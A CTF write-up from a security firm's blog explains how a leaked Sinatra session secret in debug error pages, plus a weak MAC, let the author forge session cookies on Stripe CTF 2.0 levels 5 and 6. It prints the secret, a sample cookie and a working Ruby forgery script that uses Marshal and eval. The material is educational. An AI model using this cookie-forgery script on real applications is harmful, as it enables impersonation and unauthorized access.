This article is part 10 of a 10 series blog detailing the approaches and solutions to hacking through Stripe’s 2012 CTF 2.0. To continue from the parent article, or see more hacks, please click here.
This blog entry details some bonus approaches used by Andre Azzolini in attacking the Stripe CTF 2.0 Challenge Levels 5 and 6.
***
This vulnerability was patched early on, but I was able to use it to exploit both levels 5 and 6. At first, Sinatra 500 errors would generate the debug Sinatra page, which just so happened to include the secret key that the server was using to sign session cookies. In my case, it looked like this:
dMx\354\341\260f27270\212\236c\335\34406\a\316\32305\e\315\32116
You also have access to your session cookie, which might have looked like this:
BAh7CCINdHJhY2tpbmd7CCIZSFRUUF9BQ0NFUFRfRU5DT0RJTkciLWVk MmIz%0AY2E5MGE0ZTcyMzQwMjM2N2ExZDE3YzhiMjgzOTI4NDIzOTgiG UhUVFBfQUND%0ARVBUX0xBTkdVQUdFIi1jYzlmNmZlYzY1MmE0MjU4Ym M2ZDI5Mjg3MDUyMTc5%0AYWIxZTBkMTQ3IhRIVFRQX1VTRVJfQUdFTlQ iLTFhNmIwMTRhNTRjZTg5YTJi%0AOTUzNGU3ZTA4NTUzYjA4NmI2MTc3 NDgiCWNzcmYiRTgwYjZlZTVhOGM3YjFi%0ANGM2NmFkM2NhNWEyM2I3N zg5YTNhMDViNjlhNGIwOWZlZWJmMGNhODVhMDU3%0AM2Y0ODYiD3Nlc3 Npb25faWQiRTdlYTY2ZjFlN2U2NDIwZWNkNThlMWExZWE0%0AM2YwYTU 2ZTE3YTZiZTBmYjRhNTM5MjczNWE1OGE0NGIyYTdlMzY%3D%0A--f0a1 6d0b063c881c92e519e5e933c07d0a06506d
Unfortunately, Sinatra is using a terrible HMAC function (really, it’s a MAC function — if it used HMAC, this wouldn’t have been a vulnerability).
Since we know this, we are able to manipulate our session cookie to replace certain values and still be valid. For example, for level 5, I replaced “level02-2.stripe-ctf.com” with “level05-1.stripe-ctf.com”. For level 6, I replaced my username with “level07-password-holder”. This then tricks Sinatra into thinking you’re someone else. You can achieve this with the following simple code:
require 'uri' require 'base64' require 'readline' require 'openssl'
def generate_hmac(data, secret) OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data) end
decoded_original = Marshal.load Base64.decode64 URI.unescape Readline.readline 'original: ' # paste in the original cookie value for this value_to_be_replaced = Readline.readline 'value to be replaced:' # this would be "level02-2.stripe-ctf.com" for example value_to_replace_with = Readline.readline 'value to replace with:' # this would be "level05-1.stripe-ctf.com" for example
hacked_value = decoded_original.inspect.sub(value_to_be_replaced, value_to_replace_with) encoded_hacked = Base64.encode64 Marshal.dump eval hacked_value
this is the unpacked representation of the "dMx..." key posted above
secret = [100, 77, 120, -20, -31, -80, 102, 23, 23, 48, -118, -98, 99, -35, -28, 6, 7, -50, -45, 5, 27, -51, -47, 14].pack('c*')
hmac = generate_hmac(encoded_hacked, secret) uri_encoded_hacked = URI.escape encoded_hacked puts "\nThe hacked cookie is: #{uri_encoded_hacked}--#{hmac}"
Simply set your session cookie to the value printed by the program, and you’ll have gained the authorization you were after!
***
These solutions are presented as a unique approach to a recent CTF hacking contest as an outreach of the Credera Security Team. All ‘hacking’ was performed in an ethical manner in accordance with Credera’s Core Values. For further information on Credera’s offerings in ethical hacking, security, compliance, and OWASP preparedness please contact us at securityteam@credera.com
Contact Us
Ready to achieve your vision? We're here to help.
We'd love to start a conversation. Fill out the form and we'll connect you with the right person.
Searching for a new career?
View job openings